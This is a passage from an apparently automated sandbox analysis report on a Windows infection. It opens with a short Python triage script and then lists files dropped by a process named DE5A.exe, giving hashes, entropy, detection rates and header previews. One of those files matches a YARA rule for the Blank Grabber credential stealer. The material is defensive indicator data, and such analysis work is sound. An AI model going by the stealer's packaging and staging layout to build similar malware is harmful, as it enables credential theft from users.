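    if opt_size >= 70 and opt + 70 <= len(data):
        subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    parts = [fmt, "executable", "(DLL)" if chars & IMAGE_FILE_DLL else ""]
    parts.append(f"({SUBSYSTEM_NAMES[subsystem]})" if subsystem in SUBSYSTEM_NAMES else "")
    parts.append(MACHINE_NAMES.get(machine, f"machine 0x{machine:04x}"))
    return " ".join(p for p in parts if p) + ", for MS Windows"


def preview(data: bytes, length: int = 256) -> str:
    """Printable ASCII kept, every other byte rendered as '.', as in the report's Preview field."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data[:length])


def triage(data: bytes) -> dict:
    """Recompute the per-file record the report prints for each dropped file."""
    ent = shannon_entropy(data)
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": ent,
        "Encrypted": ent >= ENTROPY_ENCRYPTED_THRESHOLD,
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
        "Preview": preview(data),
    }


def build_sample_dll() -> bytes:
    """Constructed minimal PE32+ console DLL (headers only, no code): test input, not a file from the report."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew: PE signature at offset 0x80
    stub = b"This program cannot be run in DOS mode.\r\n$".ljust(0x80 - 0x40, b"\0")
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, IMAGE_FILE_DLL | 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)  # PE32+ optional-header magic
    struct.pack_into("<H", opt, 68, 3)     # IMAGE_SUBSYSTEM_WINDOWS_CUI (console)
    return bytes(dos) + stub + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Replace build_sample_dll() with open(path, "rb").read() to check a real dropped file.
    for key, value in triage(build_sample_dll()).items():
        print(f"{key}:{value}")
```

Entropy near 5 bits per byte, as for the DLLs above, is typical of plain compiled code and data; packed or encrypted payloads sit close to 8. Note that Malicious:false with a 0% ReversingLabs detection says only that the dropped file itself matches no known-bad signature; a file written by a process the report already flags still warrants a hash comparison against a known-good copy before it is trusted.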

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):22136
Entropy (8bit):4.810971823417463
Encrypted:false
SSDEEP:192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
MD5:A0776B3A28F7246B4A24FF1B2867BDBF
SHA1:383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
SHA-256:2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
SHA-512:7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):1333651
Entropy (8bit):5.5868779115750264
Encrypted:false
SSDEEP:12288:uttcY+bS4OmE1jc+fYNXPh26UZWAzDX7jOIqL3CjHgopRdmoPFHz1dcfsFvaYcIe:uttcY+NHSPD/e2cqRdmoPxzQIaYcIe
MD5:8DAD91ADD129DCA41DD17A332A64D593
SHA1:70A4EC5A17ED63CAF2407BD76DC116ACA7765C0D
SHA-256:8DE4F013BFECB9431AABAA97BB084FB7DE127B365B9478D6F7610959BF0D2783
SHA-512:2163414BC01FC30D47D1DE763A8332AFE96EA7B296665B1A0840D5197B7E56F4963938E69DE35CD2BF89158E5E2240A1650D00D86634AC2A5E2AD825455A2D50
Malicious:false
Reputation:unknown
Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):110984
Entropy (8bit):7.696752308710476
Encrypted:false
SSDEEP:1536:n9JWx0ZlZV1wIhkmsW3v5rqAyvHMiUqu6fLmqsWb0ESs1lqAkZKKfvPykX5DlhLH:DH19hdsWftxPq7TmPFTXZ/fydp0
MD5:0E72CD64DE3B2DCAF5E8C865210CF79B
SHA1:C74631D639E609A71A05BC00AE57C9DCCC2E388B
SHA-256:039BE3916BE3310D9967AEEDF24C354E881ECD4213A9E64871801A12FF606B26
SHA-512:DDCF6E785F2067A04D6F3B5991EDFF54C4E7B48B9A8F186DD68EA0DF261E70846CD0E96DFE07357A6005E9819FE760E8BDB4143798E58FCABCD5F298A2564467
Malicious:false
Reputation:unknown
Preview:PK........8..X.\..............stub-o.pyc..........8f.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:data
Category:dropped
Size (bytes):271628
Entropy (8bit):7.9960131360560105
Encrypted:true
SSDEEP:6144:beJP6qQZDyuYii3eKNdmwB9eSCOK55UMxM9hQrF08rObP:2q9yoi3eKNdlP9Cr5PxIurw
MD5:A916B1FEE5C681D033175305BB399B74
SHA1:C3A17B54D5CDAF56536CEEBFD58701EE2C574E2F
SHA-256:067B93B38E89D000BFECC2612066F94434B3A850B0B9B22F4C0E9C62211B056E
SHA-512:4440F974011650E8DB814E269D7D02206D14BF66317A408A799564FBB83F3080AA7B43624EE3FAC0842AE72757209D9F21684CB94CAD5A021968CEFBD0B6B74B
Malicious:false
Reputation:unknown
Preview:.@z......._pA...$h.H.....R..C)...i....38..Z~.4.w........|;.pq.....)O..G..)a...K......I8L.eN...LOY...p"m?.x.>....E.....&.I..N...p.+...1..r..C0d...... .rO.$...^......,...:..r..L..*.I...odWs.;$...c..b..........*O`..?<.3.#.O..v.OA....*.`..c...L......-...n....zB............)U...,y.......+.J]0..'..p...8AN$...1>'.....w.J...r..x'^..M....B.D./P.t.U.M.(.|........9d.....I.(."P....N"../.......%C...o..I.x....i..*...;(.E.._..7..Z.-..#.._BR~.]Bi.%...~r.5.....*.B3.(..0...@l$Vc...Eh:..i=?...w.*..oxlY.n..{..U.@pB..+ i.Jd.@L... .H.....>.1mx'^R'8.c...m....s.:...WaWT6\.....z.q........N....~H.3..o..O.*....\..T.<L.X..xy..i...;i..FH.._....u1....*.j.U.B.xP4.F..d.`.DUuA'.|:*#,...<.d+.]...R.X.E.h...d.!.A....e.^......#.h..<.F.Z._..6.....E.1..cg...<.......G1L. ...@}.@....."..G..X..U..k.(...=|5.W.^.....t....*x.n..g"y...b+.DW.\[..........X..X..Q..#.&G.x..T...>.F....../G...J...Z..#.x7.<s.x'L.t..........&...#j..2.,....!g.9.C.....x4........^.-...4!i..7..r.M..^...@..._..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1635096
Entropy (8bit):7.95287803315892
Encrypted:false
SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
MD5:7F1B899D2015164AB951D04EBB91E9AC
SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29968
Entropy (8bit):7.677818197322094
Encrypted:false
SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:08B000C3D990BC018FCB91A1E175E06E
SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):228120
Entropy (8bit):7.928688904391487
Encrypted:false
SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1806616
                                                                                                                                                                                                                                Entropy (8bit):7.993924698335258
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:xm7u77uID/cZXnJ4Ph3tLm82R8PeDCemJ:Y7uJcZX6pumfJ
                                                                                                                                                                                                                                MD5:FB8BEDF8440EB432C9F3587B8114ABC0
                                                                                                                                                                                                                                SHA1:136BB4DD38A7F6CB3E2613910607131C97674F7C
                                                                                                                                                                                                                                SHA-256:CB627A3C89DE8E114C95BDA70E9E75C73310EB8AF6CF3A937B1E3678C8F525B6
                                                                                                                                                                                                                                SHA-512:B632235D5F60370EFA23F8C50170A8AC569BA3705EC3D515EFCAD14009E0641649AB0F2139F06868024D929DEFFFFFEFB352BD2516E8CD084E11557B31E95A63
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ._.A...A...A.......A.......A.......A.......A.......A...9e..A...9...A...A...@......cA.......A.......A.......A..Rich.A..........PE..d...cK.f.........." ...&..........P..ak...P..................................Pl...........`.........................................H.k.d....yk......pk......._.TI...........Ll. ...........................0mk.(...pmk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):630736
                                                                                                                                                                                                                                Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):456
                                                                                                                                                                                                                                Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI35882\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26392
                                                                                                                                                                                                                                Entropy (8bit):7.4349429154342905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:GW9SNyB153wXwCp5DlIjQGO/5YiSyv38aAMxkE7:4a3aDlIjQGOx7Sy/8Yxn
                                                                                                                                                                                                                                MD5:08B4CAEACCB6F6D27250E6A268C723BE
                                                                                                                                                                                                                                SHA1:575C11F72C8D0A025C307CB12EFA5CB06705561D
                                                                                                                                                                                                                                SHA-256:BD853435608486555091146AB34B71A9247F4AAA9F7ECFBC3B728A3E3EFDE436
                                                                                                                                                                                                                                SHA-512:9B525395DEC028EF3286C75B88F768E5D40195D4D5ADAB0775C64B623345D81DA1566596CC61A460681BC0ADBA9727AFC96C98AD2E54FF371919F3DB6D369B0C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):660248
                                                                                                                                                                                                                                Entropy (8bit):7.993344862024604
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:12288:QTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMdxsp2gB:QTdlyK5oFVDQ4GGYsaejd1/oeTp2gB
                                                                                                                                                                                                                                MD5:482B3F8ADF64F96AD4C81AE3E7C0FB35
                                                                                                                                                                                                                                SHA1:91891D0EABB33211970608F07850720BD8C44734
                                                                                                                                                                                                                                SHA-256:1FBDB4020352E18748434EF6F86B7346F48D6FB9A72C853BE7B05E0E53EBBB03
                                                                                                                                                                                                                                SHA-512:5DE56E00AB6F48FFC836471421D4E360D913A78EE8E071896A2CD951FF20F7A4123ABD98ADF003CE166DCC82AAD248EBF8B63E55E14ECEEC8AA9A030067C0D1D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....0...........................................................`..............................................#......................h......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1016584
Entropy (8bit):6.669319438805479
Encrypted:false
SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):302360
Entropy (8bit):7.986911403608574
Encrypted:false
SSDEEP:6144:CI6xDUAPCa+tr3XyOu6sNq64AnCK+V3evv7J7usiUZonaJnZ54QZ:CDLB+tryJ6sI647m7Fu4oM4QZ
MD5:27B3AF74DDAF9BCA239BF2503BF7E45B
SHA1:80A09257F9A4212E2765D492366ED1E60D409E04
SHA-256:584C2ECEA23DFC72AB793B3FD1059B3EA6FDF885291A3C7A166157CF0E6491C4
SHA-512:329C3A9159EA2FDCE5E7A28070BCF9D6D67ECA0B27C4564E5250E7A407C8B551B68A034BFDE9D8D688FA5A1AE6E29E132497B3A630796A97B464762CA0D81BB7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.`.......0.......@................................................`.............................................X....................@.........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):119192
Entropy (8bit):6.6016214745004635
Encrypted:false
SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49944
Entropy (8bit):7.787272734180523
Encrypted:false
SSDEEP:768:MXjTDOU1Mkw8KBJ7QlIRZcz63VPzH8y5GNexMpO/IjCVD0P5YiSyvEAMxkE4s:GnO7kwXBJ78OZENkB/IjCVDc7SyqxJ
MD5:980EFF7E635AD373ECC39885A03FBDC3
SHA1:9A3E9B13B6F32B207B065F5FCF140AECFD11B691
SHA-256:B4411706AFC8B40A25E638A59FE1789FA87E1CE54109BA7B5BD84C09C86804E1
SHA-512:241F9D3E25E219C7B9D12784AB525AB5DED58CA623BC950027B271C8DFB7C19E13536F0CAF937702F767413A6D775BED41B06902B778E4BAD2946917E16AD4EF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.............t....................................................`.............................................H....................0..8.....................................................@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):60696
Entropy (8bit):7.826186640993217
Encrypted:false
SSDEEP:1536:dQm2JyhT7X84MYNbLlJRiQFM+pIWHIjLPj+7SyANx4:dQ9JyhT7nHnjFXeiIjLPj+6U
MD5:A8CB7698A8282DEFD6143536ED821EC9
SHA1:3D1B476B9C042D066DE16308D99F1633393A497A
SHA-256:40D53A382A78B305064A4F4DF50543D2227679313030C9EDF5EE82AF23BF8F4A
SHA-512:1445AE7DC7146AFBE391E131BAFF456445D7E96A3618BFEF36DC39AF978DD305E3A294ACD62EE91A050812C321A9EC298085C7AD4EB9B81E2E40E23C5A85F2CC
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............P-.......................................P............`.........................................HL.......I.......@.......................L......................................`9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):107800
Entropy (8bit):7.9398737446938865
Encrypted:false
SSDEEP:3072:drlajXG60D6JCd/WQG+nA1kR6rLlG/iIjOql7ph:dsC60D6Y/WKAEggD7n
MD5:CCFAD3C08B9887E6CEA26DDCA2B90B73
SHA1:0E0FB641B386D57F87E69457FAF22DA259556A0D
SHA-256:BAD3948151D79B16776DB9A4A054033A6F2865CB065F53A623434C6B5C9F4AAD
SHA-512:3AF88779DB58DCAE4474C313B7D55F181F0678C24C16240E3B03721B18B66BDFB4E18D73A3CEF0C954D0B8E671CF667FC5E91B5F1027DE489A7039B39542B8CA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p................................................... ............`.............................................P.......................`'......................................................@...........................................UPX0....................................UPX1.....p.......d..................@....rsrc................h..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36632
                                                                                                                                                                                                                                Entropy (8bit):7.660102821783565
                                                                                                                                                                                                                                Encrypted:false
